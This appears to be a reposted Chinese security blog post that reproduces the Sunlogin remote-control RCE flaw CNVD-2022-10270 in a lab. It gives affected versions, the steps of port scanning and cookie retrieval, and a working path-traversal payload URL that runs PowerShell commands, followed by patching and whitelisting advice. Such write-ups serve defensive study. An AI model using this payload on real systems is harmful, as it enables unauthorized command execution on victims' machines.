CNVD-2022-10270向日葵远程命令执行漏洞复现

admin 2025年2月20日09:15:42评论43 views字数 1266阅读4分13秒阅读模式

点击蓝字 关注我们

一、介绍

       向日葵远程控制是一款面向企业和专业人员的远程pc管理和控制的服务软件。可以在任何有网络的情况下,轻松访问并控制安装了向日葵客户端的远程主机。同时还能实现远程文件传输、远程视频监控等功能,这不仅为用户的使用带来很多便捷,还能为其提供各类保障。

    Sunlogin RCE是漏洞发生在接口/check处,当参数cmd的值以ping或者nslookup开头时可以构造命令实现远程命令执行利用,客户端开启客户端会自动随机开启一个大于40000的端口号

二、影响版本

CNVD-2022-10270:

向日葵个人版for Windows <= 11.0.0.33

CNVD-2022-03672:

向日葵简约版 <= V1.0.1.43315(2021.12)

三、漏洞复现

向日葵客户端版本:11.0.0.33162

操作系统:win10

目标靶机IP地址:192.168.159.129

CNVD-2022-10270向日葵远程命令执行漏洞复现

win10安装向日葵客户端,并运行

CNVD-2022-10270向日葵远程命令执行漏洞复现

方法一:

1、对靶机IP进行40000以上的端口扫描,查看开放端口

CNVD-2022-10270向日葵远程命令执行漏洞复现

2、有两个端口,通过curl验证一下存在漏洞:(开放的是56600)

CNVD-2022-10270向日葵远程命令执行漏洞复现

3、浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras,获取cookie值

CNVD-2022-10270向日葵远程命令执行漏洞复现

4、拿到cookie后,添加payload发送:

http://192.168.159.129:56600/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

CNVD-2022-10270向日葵远程命令执行漏洞复现

方法二:工具利用

1、使用工具检测:

CNVD-2022-10270向日葵远程命令执行漏洞复现

2、命令执行:

CNVD-2022-10270向日葵远程命令执行漏洞复现

3、查看结果:

CNVD-2022-10270向日葵远程命令执行漏洞复现

四、修复建议

1、目前厂商已发布了漏洞修复程序,请及时更新至最新版本,向日葵官方已发布了修复版本,请及时更新:https://sunlogin.oray.com/

2、设置白名单:如果目前无法升级,在业务环境允许的情况下,使用白名单限制web端口的访问来降低风险。

CNVD-2022-10270向日葵远程命令执行漏洞复现

       银天信息专注于软件研发、信息安全与智慧城市等领域的创新发展,是政府及企业数字化、智慧化建设的重要合作伙伴,银天信息立足”为社会服好务、为员工谋福祉”的社会责任,秉承“以技术为引领、以市场为导向、以用户为中心”的发展理念。

       自1996年成立以来,银天信息以产业前瞻研究和行业深度理解为双引擎,基于云计算、大数据、物联网、5G等先进技术形成了贯穿政府、企业数字化转型生命周期的“全栈式”产品及解决方案,包括IT战略咨询、规划、设计、实施、运营与商业模式创新等,为用户输出同步国际的智慧城市建设体系,实现IT云化和数据价值激活,提升整体核心竞争力。目前,已经与政府、教育、能源、金融、电信、医疗等行业客户开展深入的合作。

CNVD-2022-10270向日葵远程命令执行漏洞复现

CNVD-2022-10270向日葵远程命令执行漏洞复现

原文始发于微信公众号(银天信息):CNVD-2022-10270向日葵远程命令执行漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月20日09:15:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CNVD-2022-10270向日葵远程命令执行漏洞复现https://cn-sec.com/archives/898765.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息